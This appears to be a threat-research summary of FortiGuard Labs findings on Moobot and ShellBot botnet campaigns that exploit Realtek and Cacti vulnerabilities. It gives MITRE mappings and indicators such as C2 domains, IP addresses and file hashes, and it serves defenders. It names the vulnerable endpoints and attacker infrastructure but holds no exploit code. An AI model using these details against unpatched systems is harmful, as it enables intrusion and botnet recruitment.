Threat Research

Moobot Strikes Again – Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs

Securonix

FortiGuard Labs tracked bursts of attacks in January and March exploiting Realtek CVE-2021-35394 and Cacti CVE-2022-46169, spreading ShellBot and Moobot malware. Moobot (a Mirai variant) can be controlled via a C2 server to conduct further attacks such as DDoS, while ShellBot uses Perl/IRC for command and control. #Moobot #ShellBot #CVE-2021-35394 #CVE-2022-46169 #Realtek #Cacti

Keypoints

  • FortiGuard Labs observed bursts targeting Realtek and Cacti vulnerabilities in Jan and Mar, leading to ShellBot and Moobot deployments.
  • Moobot is a Mirai variant that can control compromised devices via a C2 server and launch DDoS attacks.
  • ShellBot is a Perl IRC-based botnet with multiple variants and C2 configurations described in the article.
  • The Realtek vulnerability CVE-2021-35394 enables arbitrary command execution on UDPServer, enabling payload delivery.
  • The Cacti vulnerability CVE-2022-46169 allows unauthenticated code execution via remote_agent.php, enabling Moobot/ShellBot payloads.
  • Fortinet protections include FortiGuard Antivirus detections, IPS signatures, web filtering, and IP reputation to mitigate these threats.

MITRE Techniques

  • [T1190] Exploit Public-F facing Application – Realtek and Cacti vulnerabilities are used to execute commands on exposed devices. ‘CVE-2021-35394 is an arbitrary command injection vulnerability that affects UDPServer due to insufficient legality detection on commands received from clients.’
  • [T1105] Ingress Tool Transfer – The malware payload is downloaded after initial access; ‘The script file to further download Moobot is shown below. It executes the Moobot with the parameter realtek..’
  • [T1059] Command and Scripting Interpreter – ShellBot is a malware developed in Perl that uses the Internet Relay Chat (IRC) protocol to communicate with the server, also known as PerlBot. ‘
  • [T1071] Application Layer Protocol – The malware establishes C2 with the server; ‘Once executed, it prints “listening to tun0” to the console and then starts communicating with the C2 host “troon[.]dns[.]army” with the heartbeat message “0x336699”.’

Indicators of Compromise

  • [IP Address] Malware hosts – 104.244.76.105, 156.224.24.249, and 6 more IPs
  • [Domain] C2 servers – troon.dns.army, juice.baselinux.net, and 6 more domains
  • [File Hash] Moobot payload hashes – 455314a186b4a9a1788e2acb85a9b6b34fb0a7700d0decc6de056030fea543df, 0d4be7af347f2cb80dcd71cd94f1f39a6f3dbe71765d824bb0d66c11b8759cd7

Read more: https://www.fortinet.com/blog/threat-research/moobot-strikes-again-targeting-cacti-and-realtek-vulnerabilities

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint